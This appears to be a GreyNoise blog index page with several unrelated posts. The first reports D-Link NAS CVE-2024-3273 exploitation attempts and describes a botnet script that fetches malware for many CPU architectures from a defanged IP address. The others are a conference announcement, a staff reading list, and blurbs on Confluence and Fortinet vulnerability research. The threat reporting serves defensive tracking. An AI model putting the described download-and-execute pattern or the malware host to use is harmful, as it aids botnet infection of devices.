GreyNoise quickly released a tag for tracking under D-Link NAS CVE-2024-3273 RCE Attempt, which was relatively easy for us because our Sift tooling surfaced the exploit to us automatically. Sift curates a report of new/interesting traffic observed by GreyNoise sensors daily after doing much of the analysis and triage work itself.

You can read more about Sift and check it out for yourself at https://sift.labs.greynoise.io/

Sift’s analysis above is correct! Taking it a step further, the command the above IP is attempting to execute is a generic shell script pattern used by botnet operators to try to execute malware for every possible CPU architecture in the expectation that at least one will work. The malware is fetched from 38[.]6[.]224[.]248 over HTTP.

We have retrieved the sample skid.x86 and uploaded it to VirusTotal for sharing and further analysis:

NetNoiseCon: Amplifying the Future of InfoSec

In the InfoSec community, sharing knowledge and expertise is key to moving the industry forward and crucial to creating the next generation of security professionals. As part of our commitment to building and investing in the community, we’re excited to announce our new online conference series: NetNoiseCon.

NetNoiseCon is a livestream conference viewable on the GreyNoise YouTube channel on April 19th, starting at 12pm ET / 9am PT.

The conference will feature both technical and career-advice focused talks, with speakers from  across the InfoSec industry and the GreyNoise researcher community. We’ve curated a set of talks with the goal in mind that all viewers should come away with new skills or insights that they can use in their work ASAP.

Here’s our NetNoiseCon v1 speaker lineup:

  • Matt Johansen, Vulnerable U newsletter
  • Santiago Holley, VP of Threat Management at RedTrace
  • Kimber Duke, Senior Product Manager at GreyNoise
  • Greg Lesnewich, Senior Threat Researcher at Proofpoint & GreyNoise Ambassador
  • Joseph McDonagh, GreyNoise Ambassador
  • floofpwn, independent security researcher

YouTube Livestream event:

Click the “Notify Me” button to receive a notification when we go live or sign-up for a reminder here. Join us on the livestream for the event and hang out in our community Discord server to join our post-event voice chat / StarCraft sessions 👾.

We hope to see you there!!

- Sam Houston, Senior Community Manager, GreyNoise

What We're Reading: March 2024

Welcome to our Monthly Roundup, where we curate a unique mix of articles, books, podcasts, and more that have captured the attention of the GreyNoise team. From deeply technical articles to literary treasures, join us on this eclectic journey through the media that sparks our curiosity each month. Explore + discover as we share the gems that have fueled our inspiration!

Louis Evans // Director of Product Marketing

Travel Light | Naomi Mitchinson (from Rich Horton's recommendation)

🐲 Thoughts: It's a Norse-inspired fairytale incongruously grounded in the very real history of the Byzantine Empire and Eastern Europe; beautifully humane and strikingly alien. It also might be the lost ancestor of all the princess-and-dragon subversions that are so (thankfully!) common these days.

Brianna Cluck // Researcher

👻 Camp Damascus | Chuck Tingle 

Why I like it: It's a real page turner of a horror novel about quite literally facing your demons.  Highly recommend it if you like horror, if you are socially awkward and want a relatable protagonist or if you like books about queer people taking down a conversion therapy camp.

Ronnie Villarini // Senior Software Engineer

🕰️ Four Thousand Weeks: Time Management for Mortals | Oliver Burkeman

Thoughts: Great book that I think I'll keep coming back to; this is my second time, as I always seem to find something new. It's a nice, albeit brutal, reminder that life is short and time cannot be "managed" the way other productivity books would make it seem. You will always have to make sacrifices; just make sure you pay attention to what you're sacrificing.

🦥 Slow Productivity: The Lost Art of Accomplishment Without Burnout | Cal Newport 

Why I liked it: In a similar vein, I read Slow Productivity, Not my favorite by Cal Newport, but it was still a good read. Probably not a lot in here that you haven't heard before but probably don't think about regularly. Still, there was some great insight, especially in regard to the difference between "obsessing over quality" and "perfectionism." Definitely recommend it for the the productivity nerds.

Frank Severic // Sales Development Rep

💰 The Challenger Sale: Taking Control of the Customer Conversation | Matthew Dixon + Brent Adamson

Why I like it: A recommendation by a co-worker, Mike Baker, exploring the results of a study done by CEB on behaviors and attitudes that drive performance in complex sales in-spite-of market fluctuations. The authors were surprised that they did not arrive at their hypothesis, so it makes a highly interesting read backed by research data.

Fossil Capital: The Rise of Steam Power and the Roots of Global Warming | Andreas Malm

Thoughts: This one is taking some time, clocking in at a thick 400 pages, but Andreas Malm did an impressive amount of cited research constructing a narrative that challenges the traditional thinking that energy production was driven by market forces, arguing instead their hypothesis that it was not economic incentive, but centralized control of labor and means of production. Malm offers a deep dive into the political and social ramifications of disrupting the status quo of fossil fuel-driven infrastructure.

Where are they now? Starring: Atlassian's Confluence CVE-2023-22527

Ever wonder what happens to vulnerabilities after they're forgotten? 

In a new blog from the GreyNoise Labs team, we look at CVE-2023-22527, an Atlassian Confluence vulnerability that was all over the news back in January/2024, then forgotten a week later. But even though the media has forgotten, attackers haven't!

The Labs team digs a little into who the attacker is and their techniques - killing other malware, deleting log files, and even using SSH keys to infect other hosts.

If you're interested in how attackers use old vulnerabilities and what they do once they're on a host, check it out

Hunting for Fortinet's CVE-2024-21762

Here at GreyNoise, we’re pretty lucky to see a lot of proof of concepts on the wire as they’re released, but sometimes we have to seek them out ourselves. When CVE-2024-21762, an out-of-bounds write vulnerability in Fortinet FortiOS and FortiProxy, was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog, it became one such case. With no writeup or proof of concept available, follow along as our researcher h0wdy goes down the rabbit hole to get enough information to develop a detection for our sensors. 

Check out the blog!

If you’re just looking for the tag, you can track Fortinet's CVE-2024-21762 here:

No blog articles found

Please update your search term or select a different category and try again.